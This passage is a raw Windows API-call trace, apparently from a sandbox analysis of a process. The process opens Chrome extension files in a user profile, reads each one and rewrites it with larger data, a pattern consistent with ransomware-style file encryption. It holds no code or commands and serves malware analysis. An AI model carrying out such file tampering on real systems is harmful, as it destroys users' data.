ReadFile (in: hFile=0x1cc, lpBuffer=0x26c49b8, nNumberOfBytesToRead=0xde, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c49b8*, lpNumberOfBytesRead=0x2e9f2bc*=0xde, lpOverlapped=0x0) returned 1 [0178.717] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0178.717] WriteFile (in: hFile=0x1cc, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x666, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x2e9f2d0*=0x666, lpOverlapped=0x0) returned 1 [0178.717] CloseHandle (hObject=0x1cc) returned 1 [0178.718] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0178.718] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0178.719] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x144 [0178.719] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0178.719] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.719] ReleaseMutex (hMutex=0x168) returned 1 [0178.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0178.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0178.719] ReadFile (in: hFile=0x1cc, lpBuffer=0x2851278, nNumberOfBytesToRead=0x144, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2851278*, lpNumberOfBytesRead=0x2e9f2bc*=0x144, lpOverlapped=0x0) returned 1 [0178.720] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0178.720] WriteFile (in: hFile=0x1cc, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x6cc, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x2e9f2d0*=0x6cc, lpOverlapped=0x0) returned 1 [0178.720] CloseHandle (hObject=0x1cc) returned 1 [0178.721] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0178.721] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0178.721] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xa89c [0178.721] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0178.721] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.722] ReleaseMutex (hMutex=0x168) returned 1 [0178.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="background_script.js", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0178.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="background_script.js", cchWideChar=20, lpMultiByteStr=0x1f88c44, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="background_script.js", lpUsedDefaultChar=0x0) returned 20 [0178.722] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a56a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0178.723] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x989c [0178.724] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0178.724] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x989c [0178.724] WriteFile (in: hFile=0x1cc, lpBuffer=0x25ad708*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad708*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0178.725] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0178.725] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0178.725] CloseHandle (hObject=0x1cc) returned 1 [0178.725] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0178.726] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0178.726] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1bef [0178.726] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0178.726] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.726] ReleaseMutex (hMutex=0x168) returned 1 [0178.726] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="chromecast_logo_grey.png", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0178.726] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="chromecast_logo_grey.png", cchWideChar=24, lpMultiByteStr=0x1f8fc6c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="chromecast_logo_grey.png", lpUsedDefaultChar=0x0) returned 24 [0178.726] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a56a8, nNumberOfBytesToRead=0x1bef, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesRead=0x2e9f2bc*=0x1bef, lpOverlapped=0x0) returned 1 [0178.728] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0178.728] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x2177, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x2177, lpOverlapped=0x0) returned 1 [0178.729] CloseHandle (hObject=0x1cc) returned 1 [0178.729] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0178.730] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0178.730] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xc26 [0178.730] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0178.730] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.730] ReleaseMutex (hMutex=0x168) returned 1 [0178.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="feedback.css", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0178.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="feedback.css", cchWideChar=12, lpMultiByteStr=0x1f7360c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="feedback.css", lpUsedDefaultChar=0x0) returned 12 [0178.730] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0xc26, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f2bc*=0xc26, lpOverlapped=0x0) returned 1 [0179.741] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0179.741] WriteFile (in: hFile=0x1cc, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0x11ae, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x2e9f2d0*=0x11ae, lpOverlapped=0x0) returned 1 [0179.742] CloseHandle (hObject=0x1cc) returned 1 [0179.742] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0179.743] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0179.743] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x941 [0179.743] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0179.744] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.744] ReleaseMutex (hMutex=0x168) returned 1 [0179.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mirroring_webrtc.js", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0179.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mirroring_webrtc.js", cchWideChar=19, lpMultiByteStr=0x1f88b2c, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mirroring_webrtc.js", lpUsedDefaultChar=0x0) returned 19 [0179.744] ReadFile (in: hFile=0x1cc, lpBuffer=0x2878b08, nNumberOfBytesToRead=0x941, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2878b08*, lpNumberOfBytesRead=0x2e9f2bc*=0x941, lpOverlapped=0x0) returned 1 [0179.746] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0179.746] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0xec9, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2e9f2d0*=0xec9, lpOverlapped=0x0) returned 1 [0179.746] CloseHandle (hObject=0x1cc) returned 1 [0179.746] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0179.748] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0179.748] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x406f [0179.748] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0179.748] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.748] ReleaseMutex (hMutex=0x168) returned 1 [0179.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0179.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7360c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0179.748] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0179.750] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x306f [0179.750] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0179.751] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x306f [0179.751] WriteFile (in: hFile=0x1cc, lpBuffer=0x289bb08*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x289bb08*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0179.751] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0179.751] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0179.751] CloseHandle (hObject=0x1cc) returned 1 [0179.752] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0179.752] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0179.753] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x419f [0179.753] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0179.753] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.753] ReleaseMutex (hMutex=0x168) returned 1 [0179.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0179.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7346c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0179.753] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0179.912] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x319f [0179.913] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.293] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x319f [0180.293] WriteFile (in: hFile=0x1cc, lpBuffer=0x2876db8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2876db8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.294] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0180.294] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0180.294] CloseHandle (hObject=0x1cc) returned 1 [0180.294] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0180.296] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0180.296] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x447a [0180.296] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0180.296] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.296] ReleaseMutex (hMutex=0x168) returned 1 [0180.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0180.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0180.296] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.818] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x347a [0180.818] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.819] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x347a [0180.819] WriteFile (in: hFile=0x1cc, lpBuffer=0x25ad6d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad6d8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.820] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0180.820] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0180.820] CloseHandle (hObject=0x1cc) returned 1 [0180.821] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 